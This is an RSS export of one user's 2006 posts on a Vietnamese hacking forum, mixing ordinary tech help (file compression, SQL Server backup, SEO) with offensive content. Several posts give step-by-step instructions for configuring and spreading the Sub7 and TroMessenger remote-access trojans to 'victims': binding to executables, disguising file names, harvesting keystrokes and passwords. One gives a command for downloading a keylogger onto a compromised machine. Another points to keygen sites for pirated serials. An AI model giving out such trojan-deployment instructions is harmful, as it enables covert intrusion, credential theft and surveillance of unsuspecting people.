<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title><![CDATA[Messages posted by "dohaichau02"]]></title>
		<link>http://www.hvaonline.net/hvaonline/posts/listByUser/126370.hva</link>
		<description><![CDATA[Messages posted by "dohaichau02"]]></description>
		<generator>JForum - http://www.jforum.net</generator>
			<item>
				<title>Phần mềm siêu nén 100MB còn vài MB!!??</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">aulachappy99 wrote:</cite><br>
		<blockquote>Em đang rất cần những phần mềm loại này để nén những software làm phim của em tới hàng GB :( Mong sao các anh chỉ giúp em! (Có loại phần mềm nén đc nhưng lại đợi mất cả đêm)

Xin cảm ơn các anh rất nhiều và chúc sức khoẻ!  :)) !!!&nbsp;
		</blockquote>

có đấy bạn, bạn dùng cái nè nhá KGB Archiver 1.1
download tại đây nè <span class="link"> http://www.echip.com.vn/echiproot/html/2006/so323/kgb_arch_win_gui.exe</span>
 và đọc hướng dẫn tại đây nhé <span class="link"> http://www.echip.com.vn/echiproot/html/2006/so323/kgb.html</span>]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/2101/10779.hva#10779</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/2101/10779.hva#10779</link>
				<pubDate><![CDATA[Fri, 28 Jul 2006 19:09:58]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Các vấn đề về chat</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">chatting wrote:</cite><br>
		<blockquote>Cho mình hỏi 1 tí về yahoo. khi minh online trong yahoo sau khi login vào rồi, chọn nick chat mình typing rồi enter nó không hiện lên trong message chat, xin cho hỏi lỗi này bị gì và cách khắc phục.
Xin cám ơn!&nbsp;
		</blockquote>

Mình thấy là do mạng chậm, mình cũng bị cái nì roài, ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/2103/10774.hva#10774</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/2103/10774.hva#10774</link>
				<pubDate><![CDATA[Fri, 28 Jul 2006 19:01:02]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Xin code làm web</title>
				<description><![CDATA[ Bác vào đây mà kiếm nhé, nhiều code lắm, đủ chủng loại 
<span class="link"> www.freecodevn.com</span> , hoặc vào manguon mà kiếm.]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1783/8799.hva#8799</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1783/8799.hva#8799</link>
				<pubDate><![CDATA[Fri, 21 Jul 2006 15:11:45]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Cho em hỏi về Google</title>
				<description><![CDATA[ To : Endless_Hope 
thanks bác nhiều , hờ hờ  :D) ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1608/8741.hva#8741</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1608/8741.hva#8741</link>
				<pubDate><![CDATA[Fri, 21 Jul 2006 12:30:34]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Làm link diễn đàn có đuôi giống như .hva  ?? ai hướng dẫn với !</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">mrdung wrote:</cite><br>
		<blockquote><p></p>
		<cite class="blockquote">KINYO wrote:</cite><br>
		<blockquote><p></p>
		<cite class="blockquote">taianhlacontrai wrote:</cite><br>
		<blockquote>để làm thử với localhost trong win được không ? nhưng trong host của win file .htaccess không có tác dụng gì thì phải ??&nbsp;
		</blockquote>

Nếu bạn thử trong Win thì sửa cái mục này trong <b>httpd.conf</b> :

<b>AddType application/x-httpd-php .php .php3 .phtml .hva</b>

Muốn nó chạy tệp đuôi kiểu gì cũng được, kể cả tên mình  :mrgreen: &nbsp;
		</blockquote>

Sặc! Mỗi một phần mở rộng đều có một chương trình biên dịch nó, với php3, php5, php thì có php5ts.dll biên dịch các mã của php. Còn *.tenban ai biên dịch vây?
bạn muốn làm *.hva cần phải dùng minetype.&nbsp;
		</blockquote>
ai lại sặc thía, vẫn làm được mờ, hình như chỉnh lại cái file gì đó (dll) trong windows, ngày xưa tui làm theo cách này mờ, đúng là chạy theo ý thích của mình, kể cả tên mình à nha. ==> bi giờ quên mất rùi :?) ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1153/8614.hva#8614</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1153/8614.hva#8614</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 22:43:18]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Cho em hỏi về Google</title>
				<description><![CDATA[ tròi oi, đó là phần Picture nói riêng thì tính làm gì, níu như vậy thì còn có cả Video trên Yahoo kia kìa bạn.
Đang bàn cách làm seo đưa web lên google và nó lưu web mình kiểu gì mà :!:) ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1608/8609.hva#8609</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1608/8609.hva#8609</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 22:30:30]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Làm sao xác định là mình cần bao nhiêu class, method nào....</title>
				<description><![CDATA[ C# thì mình ko chơi, mình dùng VB.Net nhưng mờ cũng là thuần đối tượng. Mình thấy những hàm, thủ tục nào có thể dùng chung, (dùng nhiều nơi) hoặc là những đoạn code sẽ cộp được vào nhiều nơi khác (cùng chức năng) ==> thì  nên tạo nó thành 1 class, đóng gói lại và dùng chung. :mrgreen: ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1749/8607.hva#8607</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1749/8607.hva#8607</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 22:27:39]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Làm sao để backup Database SQL Server 2000.</title>
				<description><![CDATA[ hò hò, vấn đề này khá hay, ngày xưa tớ đã mất cả đống time để tìm cái nè.
Về phần hỗ trợ, bạn có thể mở Query Analyzer ra, sau đó vào help (F1) rùi search từ Bakup ==> bạn sẽ có hướng dẫn đầy đủ.
Về phần mã SQL thì tớ sử dụng câu lệnh sau :
<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>USE Master
GO
BACKUP DATABASE MyDb
   TO Disk='D:\mybackup.bak'
   WITH FORMAT
GO</pre>
		</div>
có vậy thoai, nhưng đó là tớ viết = VB.Net còn viết = web thì chưa thử.
__________________________________________________________
Còn đây là code mà phần Help trong SQL cũng cấp :

<span class="quotetxt"><b>Code:</b></span><br/>
		<div class="coded"">
		<pre>BACKUP DATABASE { database_name | @database_name_var } 
    &lt; file_or_filegroup &gt; &#91; ,...n &#93; 
TO &lt; backup_device &gt; &#91; ,...n &#93; 
&#91; WITH
    &#91; BLOCKSIZE = { blocksize | @blocksize_variable } &#93; 
    &#91; &#91; , &#93; DESCRIPTION = { 'text' | @text_variable } &#93; 
    &#91; &#91; , &#93; DIFFERENTIAL &#93; 
    &#91; &#91; , &#93; EXPIREDATE = { date | @date_var } 
        | RETAINDAYS = { days | @days_var } &#93; 
    &#91; &#91; , &#93; PASSWORD = { password | @password_variable } &#93; 
    &#91; &#91; , &#93; FORMAT | NOFORMAT &#93; 
    &#91; &#91; , &#93; { INIT | NOINIT } &#93; 
    &#91; &#91; , &#93; MEDIADESCRIPTION = { 'text' | @text_variable } &#93; 
    &#91; &#91; , &#93; MEDIANAME = { media_name | @media_name_variable } &#93; 
    &#91; &#91; , &#93; MEDIAPASSWORD = { mediapassword | @mediapassword_variable } &#93; 
    &#91; &#91; , &#93; NAME = { backup_set_name | @backup_set_name_var } &#93; 
    &#91; &#91; , &#93; { NOSKIP | SKIP } &#93; 
    &#91; &#91; , &#93; { NOREWIND | REWIND } &#93;
    &#91; &#91; , &#93; { NOUNLOAD | UNLOAD } &#93; 
    &#91; &#91; , &#93; RESTART &#93; 
    &#91; &#91; , &#93; STATS &#91; = percentage &#93; &#93; 
&#93;</pre>
		</div>
__________________________________
Mình chỉ up tạm 1 phần lên, còn lại bạn tìm tiếp nhé.
Chúc thành công

]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1731/8604.hva#8604</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1731/8604.hva#8604</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 22:18:05]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Cách download Netcat</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">cuocdoithamlang wrote:</cite><br>
		<blockquote>Phần mềm thì có rồi,nhưng mình chẳng biết các câu lệnh của netcat, bạn nào biết thì post các câu lệnh lên đi.&nbsp;
		</blockquote>

Cái nè thì đã có riêng 1 topic rồi, bác xem lại ở đây này 
<span class="link"> http://hvaonline.net/hvaonline/posts/list/157.hva</span>
Lần sau bác chịu khó search trước nhé. :D) 
Thân ái. 
khì khì  :lol:) ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1043/8580.hva#8580</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1043/8580.hva#8580</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 20:46:22]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>TroMessanger - Chương trình điều khiển máy tính từ xa</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">blue_wonder233 wrote:</cite><br>
		<blockquote>
Thắc mắc tẹo  :wink:  nick robot là nick victim phải ko,như thế trước khi điều khiển được máy của victim thì ta phải biết được pass của nick victim ?? phải ko[/b]&nbsp;
		</blockquote>

Trùi ui, nick robot đâu có phải là nick victim đâu. Có thể hiểu đó là nick mà ta tự lập ra và vứt cho con robot dùng, sau đó ta sẽ lệnh cho nó chạy = cách chát với nó qua nick đó, vậy thui.  :D)  Dễ hỉu hà]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/395/8572.hva#8572</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/395/8572.hva#8572</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 20:14:43]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: How to use sub seven V 2.2.0 </title>
				<description><![CDATA[ Hey, chào bạn thân ái, mình tìm được bài hướng dẫn sử dụng Sub Seven roài. Ghi chú : bài này được lấy từ <span class="link"> www.diendan.vietnamnet.vn</span>

Sub7 có thể nói là một loại trojan nổi tiếng từ trước đến nay và cách sử dụng nó thì gần như là thất truyền, hôm nay tôi cũng cố gắng để mà có thể nói qua về cách sử dụng nó bằng một số tài liệu , nếu có gì sai sót mong các bạn cho y' kiến ! Một khi đã có kẻ dính chấu con này thì máy của họ xem như đã bị ta điều khiển hoàn toàn, ta có thể làm mất thanh trình đơn, xem họ gõ những gì (để lấy Password), Restart máy họ, xem xem họ chat với ai vả tiện thể chat hộ luôn, khóa bàn phím họ lại, tắt màn hình ...Đầu tiên hãy Download và giải nén con Sub7 này và giải nén nó gồm những file sau :
editserver.exe (có hình số 7 và cây búa)
ICQMAPI.dll
server.exe
SubSeven.exe (có hình số 7)
tutorial.txt
Đầu tiên bạn chạy file Editserver.exe để setup cho con trojan, khi chạy file này, một giao diện sẽ xuất hiện, trên dao diện này, bạn chọn browse rồi chọn server.exe rồi thì Open
Tiếp theo chúng ta thiết lập cấu hình cho sub7
Trong phần Startup Method[s], phần này thiết lập cho con Virus để khi xâm nhập vào máy nạn nhân, nó sẽ khởi động lúc bật máy bằng hình thức nào, thông qua Win.ini hay thông qua Registry, nếu xâm nhập bằng registry thì tồn tại dưới khóa registry nào (key name), nói dài dòng cuối cùng chắc các bạn không hiểu gì hết thôi thì bạn không nên thay đổi và cũng không cần thiết phải thay đổi phần này .
Tiếp là fần Notifications Options
Trong phần victim name:bạn nên bỏ trắng(vì như vậy con sub 7 sẻ lấy tất cả các Acount mail nào dùng chiếc máy đã bị nhiễm ,nếu thích bạn có thể điền yahoo ID của victim bạn vào cũng được,nhưng mà mình xin nói trước nha bạn sẻ bị thiệt thòi đó)
Trong phần enable ICQ notify to UIN : bạn điền mã số ICQ của bạn vào (khi bạn điền ô này, lúc nạn nhân hòa mạng internet, nó sẽ gửi thông điệp qua cho ta như IP number, tên nạn nhân... thông qua ICQ)

Trong phần enable IRC notify : Bạn khỏi điền phần này bời nó cũng tương tự như phần trên nhưng thay vì thông báo cho ta qua ICQ thì nó thông báo cho ta qua MIRC
Trong fần enable e-mail notify :
Phần Server bạn điền vào mta469.mail.yahoo.com hoặc mx2.mail.yahoo.com , mx1.mail.yahoo.com đây là những SMTP được đánh giá là khá ổn định .
Phần User : bạn bỏ trắng
(chú thích thêm là cũng như 2 fần trên,fần nay là sub 7 thông báo cho chúng ta kết wả wa mail,còn 2 cái trên lá wa trương trình chat)
Trong phần notify to : bạn điền mail của bạn vào
OK,nếu thích bạn hãy ấn TEST nó sẽ gửi thử vào hộp mail bạn một bức thư, nếu bạn nhận được thư của nó gửi là coi như OK

Tiếp theo chúng ta thiết lập tiếp phần installation

Trong phần automatically start server on port, bạn nên để nguyên. và bạn cần ghi nhớ con số này, sau phần này, bạn sẽ thấy nó cần thiết
Phần server password : bạn điền mã số để khi truy cập vào máy nạn nhân, người nào biết mã số này mới vào được. Điều này đảm bảo bạn là người duy nhất xâm nhập được vào máy nạn nhân.
Tiếp theo bạn đánh chọn vào ô protect server port and password(Ba phần tiếp theo bạn để nguyên)

Phần cuối cùng là phần độc đáo nhất : bind server with EXE file : nghe là hiểu liền. Có nghĩa là lây nhiễm con trojan này vào một file exe. nếu bạn có một file thiệp điện tử thì bạn nhiễm vào đó, khi nạn nhân chạy, họ sẽ không phát hiện được là có sự tồn tại của con Virus trong máy họ vì file EXE vẫn chạy bình thường. Tuy nhiên điều này làm tăng đáng kể kích thước file của con virus, tôi thì không dùng chức năng này mà gửi trực tiếp file server.exe cho nạn nhân. Bạn chọn browse và chọn file mu̔ 9;n lây nhiễm vào. Xong.Bạn chọn Save Newsettings ở góc dưới bên trái dao diện. Tới đây bạn đã tạo ra xong con SubSeven bạn gửi file server.exe cho nạn nhân (nhớ đổi tên file cho bắt mắt) hoặc gửi file mà bạn chọn lây nhiễm (trong phần bind server with EXE file) cho nạn nhân và dụ họ mở. Khi họ mở ra, bạn vào ICQ để chờ, một thông báo sẽ hiện lên, thông báo này có chứa số IP của nạn nhân.

Sau khi ICQ thông báo cho bạn số IP, bạn chạy file Subseven.exe Một giao diện sẽ hiện lên
Trong phần IP/UIN : bạn điền số IP mà ICQ thông báo cho bạn. Ví dụ 192.168.0.224 còn phần bên phải : port : bạn điền mã số port mà bạn dùng khi setup con trojan Ví Dụ : 27374. xong nhấn connect. một ô hiện lên yêu cầu bạn nhập mã số, bạn điền mã số khi bạn setup con trojan (server password) rồi nhấn OK, thế là xong, bạn đã xâm nhập được vào máy nạn nhân
Sau đây là 1 số chức năng: Bạn nhắp vào phần Keys/messages, nó sẽ gồm những phần : Keyboard, chat, msg message, spy, ICQ take over( Keyboard ): bạn có thể coi mã số mail trong phần get offline keys, không cho người dùng gõ phím bằng disable keyboard......;chat : bạn có thể mở 1 cửa sổ nhỏ để chát với Victim) . Sub7 còn nhiều chức năng nữa nhưng cái đó xin để cho các bạn tự tìm hiểu .Chúc các bạn thành công ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1626/8561.hva#8561</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1626/8561.hva#8561</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 19:46:18]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: sao khong the nao chay duoc TROMESSEGER thế nhỉ?</title>
				<description><![CDATA[ các pác đọc kỹ lại hướng dẫn  hoặc vào đây né
<span class="link"> http://sma-soft.ir/TroMessenger/Vietnamese_Help.htm</span>

Tiện thể : cái nick Robot ko cần điền nick của các bác, mà các bác có thể lập ra 1 cái nick khác, nick đó sau này ta sẽ dùng để (chát) điều khiển con tronjan mà ta đã cấy vào máy nạn nhân. 
Và tất nhiên phải cho nó pass của cái nick đó (Pass Robot) để con tronjan nó còn vào nick và gửi thông báo vìa  :D) .
Sau khi Build thành công thì sẽ ra 1 file .exe (vd: Output.exe) ==> file này mới là file cần gửi cho nạn nhân và dụ victim chạy nó.

Tròi đất, có bác đi gửi nguyên cho nó file TroMessengerEditServer.exe để mừ nó chơi lại à  :twisted: ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1375/8534.hva#8534</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1375/8534.hva#8534</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 18:24:59]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: How to use sub seven V 2.2.0 </title>
				<description><![CDATA[ ừa đó, nghe nói con này hay lém mà cóc biết sử dụng.
bác nào vào Helllllllppppppppp với, ko phí của tròi, mãi mới down được :?) ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1626/8533.hva#8533</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1626/8533.hva#8533</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 18:19:23]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: thâm nhập thông qua yahoo</title>
				<description><![CDATA[ cái thèng ku này dùng hay đấy chứ các pác, nó còn cho điều khiển = lệnh cmd nữa. :shock: ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/823/8529.hva#8529</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/823/8529.hva#8529</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 18:11:17]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Kiểm soát được máy Victim rồi! Ta có thể làm những gì (Tromessenger)</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">dongkivs8xx wrote:</cite><br>
		<blockquote>Ơ! Nhưng nếu muốn cài Keylogg vào máy victim thì làm như thế nào? Ý tớ là khi đã dùng tromsg để kiểm soát!????????
&nbsp;
		</blockquote>

hè, bạn đọc kỹ lại hướng dẫn mà xem ==> tại đây nè 
<span class="link"> http://sma-soft.ir/TroMessenger/Vietnamese_Help.htm</span>
Nếu muốn cài keylog vào máy victim thì tải lên host, sau đó chát với nick robot, sử dụng câu lệnh \download
vd :/download "http://www.hostname.com/folder/file.zip" "C:\SavedFile.zip"
sau khi download được file keylog vào máy victim rùi thì dùng các câu lệnh cmd để run nó.
Bạn tham khảo qua các lệnh cmdos nhé  :D) ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1606/8528.hva#8528</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1606/8528.hva#8528</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 18:09:10]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: How to use sub seven V 2.2.0 </title>
				<description><![CDATA[ Trả lời nhanh cái nhá : Đây là con Seven Sub, nó là 1 chú Backdoor, 
còn cách sử dụng chờ tớ ngâm cứu cái đã  :D ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1626/8336.hva#8336</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1626/8336.hva#8336</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 12:02:15]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Cho em hỏi về Google</title>
				<description><![CDATA[ Vậy nếu ko có Tag thì nó biết copy cái nào ??, và hiển thị trang nào với từ khóa nào ??.
Nó phải dựa trên thẻ đó thì mới copy site mình chứ, mà copy thì cũng chỉ copy Text dạng HTM thui, còn ảnh và các thứ khác thì chết Host nó á ...]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1608/8328.hva#8328</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1608/8328.hva#8328</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 11:39:41]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Bị dính X97S-YAGNUUL.GEN</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">HVA_Online2005 wrote:</cite><br>
		<blockquote>Bạn xài thử Panda đi. Mạnh lắm đó.&nbsp;
		</blockquote>

Mình thấy Panda dùng như <khỉ>, làm máy chậm đi dã man, ko nhanh = MCAfee]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1671/8299.hva#8299</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1671/8299.hva#8299</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 10:47:44]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Chuột chạy lung tung !!!! Ai trị được con này kô?</title>
				<description><![CDATA[ à quên, còn nếu chuột mà chạy loạn xạ, nhắp phải - trái tùm lum, .... thì kiểm tra lại dây chuột xem có bị chập ko ---> em từng bị cái nè.
còn nếu mà chuột tự dưng chạy có chủ đích như : lên web, mở thư mục, vào mail .... thì thử kiểm tra xem máy các pác có bị Remote ko. ---> em từng làm cái nè với bà chị, máy trông như có ma,  :lol:  điều khiển từ máy khác mà  :D ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1702/8297.hva#8297</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1702/8297.hva#8297</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 10:45:39]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Chuột chạy lung tung !!!! Ai trị được con này kô?</title>
				<description><![CDATA[ Troài oai, các pác đừng nói là dùng chuột quang nhá, đây là 1 chức năng của chuột quang thôi, virus gì trong này chứ.
ko tin à, bác thử để im chuột như là đang đọc báo xem, nó sẽ chạy về góc cho đỡ vướng màn hình đọc báo của pác  :mrgreen:  :mrgreen:  :mrgreen: ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1702/8294.hva#8294</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1702/8294.hva#8294</link>
				<pubDate><![CDATA[Thu, 20 Jul 2006 10:42:35]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Tập hợp Source hay (Nhacso, raovat, Amazon...)</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">rindodinho wrote:</cite><br>
		<blockquote>sao link die het roi vay ? up lai di &nbsp;
		</blockquote>

Source code miễn phí đủ loại thì các bác vào đây nhá, cực hay lun, nhưng mà dạo này trang này hay xỉu lém, banthwid chật quá

<span class="link"> www.freecodevn.com</span>]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/920/8133.hva#8133</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/920/8133.hva#8133</link>
				<pubDate><![CDATA[Wed, 19 Jul 2006 18:48:47]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Mã nguồn website bằng ngôn ngữ HTML ?</title>
				<description><![CDATA[ hỏi khí không phải - bác nói đùa hay nói thật đấy.
Muốn có Source HTM thì khó gì.
Cách đơn giản là vào Menu View=>Page Source (trên trình duyệt ý).
Cách nữa là Save As trang nào đó vìa, nó sẽ save về toàn HTML thôi á.
Cách hay hơn nữa là bác vào google hoặc <span class="link"> www.download.com</span>, down vìa cái soft như WinHTTrack (free nhé). Rồi dùng cái soft đó, nhập tên website mình muốn xem source như www.vnn.vn, để cho nó chạy độ 15' thì có mà cả đống source HTM.  :D 

Chả hỉu bác lấy source htm làm gì
à, còn nếu trang nào giấu source mà bác muốn xem thì vào <span class="link"> www.viewhtml.com</span> ==> nhập tên site vào đó, nó hiện ra hết source]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1635/8126.hva#8126</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1635/8126.hva#8126</link>
				<pubDate><![CDATA[Wed, 19 Jul 2006 18:39:58]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Cho em hỏi về Google</title>
				<description><![CDATA[ về việc google thống kê và hiển thị theo cách nào thì mình ko biết, nhưng để Add website vào google thì có thể dùng 2 cách sau :
Trên thẻ <head> của mỗi site ta có thể dùng khoá <keyword> ==> google sẽ xét đến khoá này nếu nó tìm thấy. 
Hoặc muốn nhanh hơn thì có thể vào trực tiếp google và nói cho "nó" biết mình cần "nó" add  :mrgreen: 
url/<span class="link"> http://www.google.com/addurl/</span> [url]]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1608/8110.hva#8110</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1608/8110.hva#8110</link>
				<pubDate><![CDATA[Wed, 19 Jul 2006 18:28:20]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>xin phần mềm donw nguyên trang web về máy???</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">virusnhan wrote:</cite><br>
		<blockquote>ai có phần mềm down trọn trang web về hông cho em xin, em có một phần nhưng bị mất rồi mong các cao thù hva giúp em, em còn nhỏ :)  :)  :) &nbsp;
		</blockquote>

WinHTTrack 
www.download.com => search   :wink: ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1457/8073.hva#8073</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1457/8073.hva#8073</link>
				<pubDate><![CDATA[Wed, 19 Jul 2006 16:58:00]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: c:\window\blockedsite.html?</title>
				<description><![CDATA[ không phải virus thì cái gì bác ?? làm gì có cái gì mà vào web bắt tắt máy đâu,
máy bác dùng deefree thì nó cũng có thể phá đc chứ,
nói chung em đoán là virus, còn con này em chưa gặp ==> bó tay :wink: 
bác cứ thử quét virus trên SafeMode xem, chắc đc]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1131/7994.hva#7994</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1131/7994.hva#7994</link>
				<pubDate><![CDATA[Wed, 19 Jul 2006 12:01:44]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>giúp em diệt con này với</title>
				<description><![CDATA[ <p></p>
		<cite class="blockquote">conanlk wrote:</cite><br>
		<blockquote>máy nhà em bị dính con perfect keyloger em diệt hoài mà không được em dùng keylogskiller mà không quét được ai có chuong trình diệt con này thì pót lên hay gởi cho em với thanks :evil:  :evil:  :evil: &nbsp;
		</blockquote>
Bác dùng Spyware Doctor ý, tìm Serial tại mấy trang keygen.ms, freeline.ms 
..v...v]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1144/7992.hva#7992</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1144/7992.hva#7992</link>
				<pubDate><![CDATA[Wed, 19 Jul 2006 11:56:48]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Cùng bàn cách chống keyloger</title>
				<description><![CDATA[ để ko bị keylogg chộp "thứ cần thiết" thì có 1 số cách, tất nhiên hiệu quả 100% thì khó có thể.
các bác có thể đơn giản là dùng Unikey, trong đó có 1 số chức năng như tự định nghĩa ra kiểu gõ mới, hoặc là dùng cách gõ tắt. Cao hơn thì các bác down soft nào chuyển đổi phím, cũng có thể dùng CTFMON.exe trong C\windows\system32.
Dùng OSk cũng hay, 
]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/1408/7987.hva#7987</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/1408/7987.hva#7987</link>
				<pubDate><![CDATA[Wed, 19 Jul 2006 11:52:34]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Re: Tặng mọi người code gái xinh</title>
				<description><![CDATA[ tròi oi, đọc qua mới khiếp, thế mà báo lá cải nó viết như trời sập tới nơi,
em mà làm luật thì iem còn tặng huân chương cho bác  :mrgreen: ==> nhờ thía mọi người cảnh giác hơn :shock: ]]></description>
				<guid isPermaLink="true">http://www.hvaonline.net/hvaonline/posts/preList/427/7969.hva#7969</guid>
				<link>http://www.hvaonline.net/hvaonline/posts/preList/427/7969.hva#7969</link>
				<pubDate><![CDATA[Wed, 19 Jul 2006 10:55:28]]> GMT</pubDate>
				<author><![CDATA[ dohaichau02]]></author>
			</item>
			<item>
				<title>Download Software for Newbie</title>
